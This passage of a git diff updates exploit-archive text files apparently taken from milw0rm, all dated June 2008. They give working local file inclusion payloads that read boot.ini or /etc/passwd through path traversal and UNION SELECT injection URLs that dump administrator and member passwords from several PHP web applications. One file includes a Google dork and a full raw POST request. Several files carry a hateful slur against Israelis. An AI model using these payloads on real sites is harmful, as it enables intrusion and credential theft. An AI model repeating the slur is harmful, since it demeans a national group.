http://192.168.24.25/kwa/Public/index.php?action=../../../../../../../../boot.ini%00 - - This exploit will open boot.ini in system file: - -[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1) -\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1) -\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect - - You can change boot.ini to /etc/passwd%00 in linux OS. 
- - -################################################################## -# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # -################################################################## - -# milw0rm.com [2008-06-26] +=========================================================== + Keller Web Admin CMS Local File Inclusion Vulnerability +=========================================================== + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. + `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + + +AUTHOR : CWH Underground +DATE : 26 June 2008 +SITE : cwh.citec.us + + +##################################################### + APPLICATION : Keller Web Admin CMS + VERSION : 0.94 Pro + VENDOR : N/A + DOWNLOAD : http://downloads.sourceforge.net/kwa +##################################################### + +--- Local File Inclusion --- + +------------------------------------- + Vulnerable File [/Public/index.php] +------------------------------------- + +@Line + + 21: if (isset($_GET['action'])) { + 22: $action=$_GET['action']; + 23: $inclConfig = $includeFolder.$action.".inc.php"; + 24: include($inclConfig); + 25: header('Location: '.$clnt_referer); + 26: die(); + 27: } + +--------- + Exploit +--------- + +[+] http://[Target]/[kwa_path]/Public/index.php?action=[LFI] + +------------- + POC Exploit +------------- + +[+] http://192.168.24.25/kwa/Public/index.php?action=../../../../../../../../boot.ini%00 + + This exploit will open boot.ini in system file: + +[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1) +\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1) +\WINDOWS [operating systems] 
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect + + You can change boot.ini to /etc/passwd%00 in linux OS. + + +################################################################## +# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # +################################################################## + +# milw0rm.com [2008-06-26] diff --git a/platforms/php/webapps/5941.txt b/platforms/php/webapps/5941.txt index 267791e5b..b499cc9ad 100755 --- a/platforms/php/webapps/5941.txt +++ b/platforms/php/webapps/5941.txt 
@@ -1,59 +1,59 @@ -================================================================= - PolyPager <= 1.0rc2 (SQL/XSS) Multiple Remote Vulnerabilities -================================================================= - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - - -AUTHOR : CWH Underground -DATE : 26 June 2008 -SITE : cwh.citec.us - - -##################################################### - APPLICATION : PolyPager - VERSION : <= 1.0rc2 - VENDOR : http://polypager.nicolashoening.de/ - DOWNLOAD : http://downloads.sourceforge.net/polypager -##################################################### - ---- Remote SQL Injection (nr) --- - ---------- - Exploit ---------- - -[+] http://[Target]/[polypager_path]/?[Web Page]&nr=[SQL Injection] - -This exploit can dump username and password in clear text - -------------- - POC Exploit -------------- - -[+] http://192.168.24.25/polypager/?Test&nr=-999/**/UNION/**/SELECT/**/1,2,3,4,admin_name,admin_pass,7,8,9,10/**/FROM/**/_sys_sys-- - - ---- Remote XSS --- - ---------- - Exploit ---------- - -[+] http://[Target]/polypager/?[Web Page]&nr=[XSS] - -################################################################## -# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # -################################################################## - -# milw0rm.com [2008-06-26] +================================================================= + PolyPager <= 1.0rc2 (SQL/XSS) Multiple Remote Vulnerabilities +================================================================= + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. 
+ `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + + +AUTHOR : CWH Underground +DATE : 26 June 2008 +SITE : cwh.citec.us + + +##################################################### + APPLICATION : PolyPager + VERSION : <= 1.0rc2 + VENDOR : http://polypager.nicolashoening.de/ + DOWNLOAD : http://downloads.sourceforge.net/polypager +##################################################### + +--- Remote SQL Injection (nr) --- + +--------- + Exploit +--------- + +[+] http://[Target]/[polypager_path]/?[Web Page]&nr=[SQL Injection] + +This exploit can dump username and password in clear text + +------------- + POC Exploit +------------- + +[+] http://192.168.24.25/polypager/?Test&nr=-999/**/UNION/**/SELECT/**/1,2,3,4,admin_name,admin_pass,7,8,9,10/**/FROM/**/_sys_sys-- + + +--- Remote XSS --- + +--------- + Exploit +--------- + +[+] http://[Target]/polypager/?[Web Page]&nr=[XSS] + +################################################################## +# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # +################################################################## + +# milw0rm.com [2008-06-26] diff --git a/platforms/php/webapps/5942.txt b/platforms/php/webapps/5942.txt index 67c8951ee..375e6e361 100755 --- a/platforms/php/webapps/5942.txt +++ b/platforms/php/webapps/5942.txt 
@@ -1,41 +1,41 @@ -========================================================== -The kroax php_fusion Remote SQL-injection. -========================================================== - -################################## -Author : boom3rang -Contact : boomerang@knaqu-shqipe.de -webpage : www.khg-crew.ws -################################## - - ---- Remote SQL Injection --- - -[+]Google Dork: inurl:"kroax.php?category" - --------------- - Exploit --------------- - -example: - -www.site.com/infusions/the_kroax/kroax.php?category= [SQL] - - - -[+] username: -www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_name,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang - - -[+] password: -www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_password,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang\ - - -ps. To find username use first "SQL" with table_name user_name, and for password use second "SQL" with table_name user_password. - - - - -========================================================== Greetz to: All my Albanian brothers ========================================================== - -# milw0rm.com [2008-06-26] +========================================================== +The kroax php_fusion Remote SQL-injection. 
+========================================================== + +################################## +Author : boom3rang +Contact : boomerang@knaqu-shqipe.de +webpage : www.khg-crew.ws +################################## + + +--- Remote SQL Injection --- + +[+]Google Dork: inurl:"kroax.php?category" + +-------------- + Exploit +-------------- + +example: + +www.site.com/infusions/the_kroax/kroax.php?category= [SQL] + + + +[+] username: +www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_name,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang + + +[+] password: +www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_password,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang\ + + +ps. To find username use first "SQL" with table_name user_name, and for password use second "SQL" with table_name user_password. + + + + +========================================================== Greetz to: All my Albanian brothers ========================================================== + +# milw0rm.com [2008-06-26] diff --git a/platforms/php/webapps/5944.txt b/platforms/php/webapps/5944.txt index 7bad54d81..bf6a696eb 100755 --- a/platforms/php/webapps/5944.txt +++ b/platforms/php/webapps/5944.txt 
@@ -1,75 +1,75 @@ -================================================================== - Galmeta Post CMS Multiple Local File Inclusion Vulnerabilities -================================================================== - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - - -AUTHOR : CWH Underground -DATE : 26 June 2008 -SITE : cwh.citec.us - - -##################################################### - APPLICATION : Galmeta Post CMS - VERSION : 0.2 - VENDOR : N/A - DOWNLOAD : http://downloads.sourceforge.net/galmetapost -##################################################### - ---- Multiple Local File Inclusion [POST Method] --- - - ----------- - Exploits ----------- - -[+] http://[Target]/[post_blog_path]/_lib/adodb_lite/tests/test_adodb_lite.php - - [-] databasetype=../../../../../../../boot.ini%00&transactions=transaction%3A&adodblite=adodblite%3A&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit - [-] databasetype=mysql&transactions=../../../../../../../boot.ini%00&adodblite=adodblite%3A&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit - [-] databasetype=mysql&transactions=transaction%3A&adodblite=../../../../../../../boot.ini%00&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit - [-] databasetype=mysql&transactions=transaction&adodblite=adodblite%3A&extend=../../../../../../../boot.ini%00&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit - [-] 
databasetype=mysql&transactions=transaction&adodblite=adodblite%3A&extend=extend%3A&date=../../../../../../../../boot.ini%00&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit - - This exploit will open boot.ini in system file: - -[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1) -\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1) -\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect - - You can change boot.ini to /etc/passwd%00 in linux OS, For view pass hash. - -------------- - POC Exploit -------------- - -[+] POST Method -[+] -[+] POST http://192.168.24.25/post_blog/_lib/adodb_lite/tests/test_adodb_lite.php HTTP/1.0 -[+] Accept: */* -[+] Content-Type: application/x-www-form-urlencoded -[+] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) -[+] Host: 192.168.24.25 -[+] Content-Length: 309 -[+] Cookie: PHPSESSID=842f465924119eaa2b0fd3664fcc3b14 -[+] Connection: Close -[+] -[+] databasetype=../../../../../../../boot.ini%00&transactions=transaction%3A&adodblite=adodblite%3A&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit - - -################################################################## -# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # -################################################################## - -# milw0rm.com [2008-06-26] +================================================================== + Galmeta Post CMS Multiple Local File Inclusion Vulnerabilities +================================================================== + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. 
CWH Underground Hacking Team .. + `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + + +AUTHOR : CWH Underground +DATE : 26 June 2008 +SITE : cwh.citec.us + + +##################################################### + APPLICATION : Galmeta Post CMS + VERSION : 0.2 + VENDOR : N/A + DOWNLOAD : http://downloads.sourceforge.net/galmetapost +##################################################### + +--- Multiple Local File Inclusion [POST Method] --- + + +---------- + Exploits +---------- + +[+] http://[Target]/[post_blog_path]/_lib/adodb_lite/tests/test_adodb_lite.php + + [-] databasetype=../../../../../../../boot.ini%00&transactions=transaction%3A&adodblite=adodblite%3A&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit + [-] databasetype=mysql&transactions=../../../../../../../boot.ini%00&adodblite=adodblite%3A&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit + [-] databasetype=mysql&transactions=transaction%3A&adodblite=../../../../../../../boot.ini%00&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit + [-] databasetype=mysql&transactions=transaction&adodblite=adodblite%3A&extend=../../../../../../../boot.ini%00&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit + [-] databasetype=mysql&transactions=transaction&adodblite=adodblite%3A&extend=extend%3A&date=../../../../../../../../boot.ini%00&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit + + This exploit will open boot.ini in system file: + +[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS 
[operating systems] multi(0)disk(0)rdisk(0)partition(1) +\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1) +\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect + + You can change boot.ini to /etc/passwd%00 in linux OS, For view pass hash. + +------------- + POC Exploit +------------- + +[+] POST Method +[+] +[+] POST http://192.168.24.25/post_blog/_lib/adodb_lite/tests/test_adodb_lite.php HTTP/1.0 +[+] Accept: */* +[+] Content-Type: application/x-www-form-urlencoded +[+] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) +[+] Host: 192.168.24.25 +[+] Content-Length: 309 +[+] Cookie: PHPSESSID=842f465924119eaa2b0fd3664fcc3b14 +[+] Connection: Close +[+] +[+] databasetype=../../../../../../../boot.ini%00&transactions=transaction%3A&adodblite=adodblite%3A&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit + + +################################################################## +# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # +################################################################## + +# milw0rm.com [2008-06-26] diff --git a/platforms/php/webapps/5946.txt b/platforms/php/webapps/5946.txt index 2dba303fb..b78a56bdc 100755 --- a/platforms/php/webapps/5946.txt +++ b/platforms/php/webapps/5946.txt 
@@ -1,68 +1,68 @@ - || || | || - o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, - ( : / (_) / ( . -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -| | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - -<> Found by : Cyb3r-1sT - -<> C0ntact : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com - -<> Groups : InjEctOr5 T3am - - -======================================================= -+++++++++++++ R3membeR Kings of injection +++++++++++++ -======================================================= - - -<<->> script : Riddles Website - -<<->> Demo site : www.easysitenetwork.com/sites/riddles/ - - -======================================================= -++++++++++++++++ pWning israel fuckers ++++++++++++++++ -======================================================= - - -<<->> D0rk : N0-WaY - -<<->> Exploit : - - for admin inf0 :: - - >>>> www.site.me/patch/riddle.php?riddleid=-999999+union+select+concat(login,0x3a,password),1,2,3,4,5,6+from+admin_login/* - - - for members inf0 :: - - >>>> www.site.me/patch/riddle.php?riddleid=-999999+union+select+concat(login,0x3a,password),1,2,3,4,5,6+from+users/* - - -======================================================= -+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ -======================================================= - - -<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker$anaconda-ksa $ sirus $ crazy-x - - :: abo-najm $ br1ght-dark $ spid3r-net $ hacker-b0y - -<<->> InjEctOr5 TeaM - - -<<->> All muslims - 
-# milw0rm.com [2008-06-26] + || || | || + o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +| | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + +<> Found by : Cyb3r-1sT + +<> C0ntact : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com + +<> Groups : InjEctOr5 T3am + + +======================================================= ++++++++++++++ R3membeR Kings of injection +++++++++++++ +======================================================= + + +<<->> script : Riddles Website + +<<->> Demo site : www.easysitenetwork.com/sites/riddles/ + + +======================================================= +++++++++++++++++ pWning israel fuckers ++++++++++++++++ +======================================================= + + +<<->> D0rk : N0-WaY + +<<->> Exploit : + + for admin inf0 :: + + >>>> www.site.me/patch/riddle.php?riddleid=-999999+union+select+concat(login,0x3a,password),1,2,3,4,5,6+from+admin_login/* + + + for members inf0 :: + + >>>> www.site.me/patch/riddle.php?riddleid=-999999+union+select+concat(login,0x3a,password),1,2,3,4,5,6+from+users/* + + +======================================================= ++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ +======================================================= + + +<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker$anaconda-ksa $ sirus $ crazy-x + + :: abo-najm $ br1ght-dark $ spid3r-net $ hacker-b0y + +<<->> InjEctOr5 TeaM + + +<<->> All 
muslims + +# milw0rm.com [2008-06-26] diff --git a/platforms/php/webapps/5947.txt b/platforms/php/webapps/5947.txt index a13fbc415..9e295dce4 100755 --- a/platforms/php/webapps/5947.txt +++ b/platforms/php/webapps/5947.txt 
@@ -1,68 +1,68 @@ - || || | || - o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, - ( : / (_) / ( . -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -| | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - -<> Found by : Cyb3r-1sT - -<> C0ntact : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com - -<> Groups : InjEctOr5 T3am - - -======================================================= -+++++++++++++ R3membeR Kings of injection +++++++++++++ -======================================================= - - -<<->> script : Tips Website - -<<->> Demo site : www.easysitenetwork.com/sites/tips/ - - -======================================================= -++++++++++++++++ pWning israel fuckers ++++++++++++++++ -======================================================= - - -<<->> D0rk : N0-WaY - -<<->> Exploit : - - for admin inf0 :: - - >>>> www.site.me/patch/tip.php?tipid=90+union+select+concat(login,0x3a,password),1,2,3,4,5+from+admin_login/* - - - for members inf0 :: - - >>>> www.site.me/patch/tip.php?tipid=90+union+select+concat(login,0x3a,password),1,2,3,4,5+from+users/* - - -======================================================= -+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ -======================================================= - - -<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus $ crazy-x - - :: abo-najm $ br1ght-dark $ spid3r-net $ hacker-b0y - -<<->> InjEctOr5 TeaM - - -<<->> All muslims - -# milw0rm.com [2008-06-26] + 
|| || | || + o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +| | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + +<> Found by : Cyb3r-1sT + +<> C0ntact : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com + +<> Groups : InjEctOr5 T3am + + +======================================================= ++++++++++++++ R3membeR Kings of injection +++++++++++++ +======================================================= + + +<<->> script : Tips Website + +<<->> Demo site : www.easysitenetwork.com/sites/tips/ + + +======================================================= +++++++++++++++++ pWning israel fuckers ++++++++++++++++ +======================================================= + + +<<->> D0rk : N0-WaY + +<<->> Exploit : + + for admin inf0 :: + + >>>> www.site.me/patch/tip.php?tipid=90+union+select+concat(login,0x3a,password),1,2,3,4,5+from+admin_login/* + + + for members inf0 :: + + >>>> www.site.me/patch/tip.php?tipid=90+union+select+concat(login,0x3a,password),1,2,3,4,5+from+users/* + + +======================================================= ++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ +======================================================= + + +<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus $ crazy-x + + :: abo-najm $ br1ght-dark $ spid3r-net $ hacker-b0y + +<<->> InjEctOr5 TeaM + + +<<->> All muslims + +# milw0rm.com [2008-06-26] 
diff --git a/platforms/php/webapps/5948.txt b/platforms/php/webapps/5948.txt index 80662cd41..56baa237e 100755 --- a/platforms/php/webapps/5948.txt +++ b/platforms/php/webapps/5948.txt 
@@ -1,68 +1,68 @@ - || || | || - o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, - ( : / (_) / ( . -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -| | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - -<> Found by : Cyb3r-1sT - -<> C0ntact : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com - -<> Groups : InjEctOr5 T3am - - -======================================================= -+++++++++++++ R3membeR Kings of injection +++++++++++++ -======================================================= - - -<<->> script : Jokes Website - -<<->> Demo site : www.easysitenetwork.com/sites/jokes - - -======================================================= -++++++++++++++++ pWning israel fuckers ++++++++++++++++ -======================================================= - - -<<->> D0rk : N0-WaY - -<<->> Exploit : - - for admin inf0 :: - - >>>> www.site.me/patch/joke.php?jokeid=-9999999+union+select+0,concat(login,0x3a,password),2,3,4,5,6,7+from+admin_login/* - - - for members inf0 :: - - >>>> www.site.me/patch/joke.php?jokeid=-9999999+union+select+0,concat(login,0x3a,password),2,3,4,5,6,7+from+users/* - - -======================================================= -+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ -======================================================= - - -<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus $ crazy-x - - :: abo-najm $ br1ght-dark $ spid3r-net $ hacker-b0y - -<<->> InjEctOr5 TeaM - - -<<->> All muslims - -# 
milw0rm.com [2008-06-26] + || || | || + o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +| | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + +<> Found by : Cyb3r-1sT + +<> C0ntact : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com + +<> Groups : InjEctOr5 T3am + + +======================================================= ++++++++++++++ R3membeR Kings of injection +++++++++++++ +======================================================= + + +<<->> script : Jokes Website + +<<->> Demo site : www.easysitenetwork.com/sites/jokes + + +======================================================= +++++++++++++++++ pWning israel fuckers ++++++++++++++++ +======================================================= + + +<<->> D0rk : N0-WaY + +<<->> Exploit : + + for admin inf0 :: + + >>>> www.site.me/patch/joke.php?jokeid=-9999999+union+select+0,concat(login,0x3a,password),2,3,4,5,6,7+from+admin_login/* + + + for members inf0 :: + + >>>> www.site.me/patch/joke.php?jokeid=-9999999+union+select+0,concat(login,0x3a,password),2,3,4,5,6,7+from+users/* + + +======================================================= ++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ +======================================================= + + +<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus $ crazy-x + + :: abo-najm $ br1ght-dark $ spid3r-net $ hacker-b0y + +<<->> InjEctOr5 TeaM + + +<<->> All muslims 
+ +# milw0rm.com [2008-06-26] diff --git a/platforms/php/webapps/5949.txt b/platforms/php/webapps/5949.txt index e1e60cdd8..f67aad34e 100755 --- a/platforms/php/webapps/5949.txt +++ b/platforms/php/webapps/5949.txt 
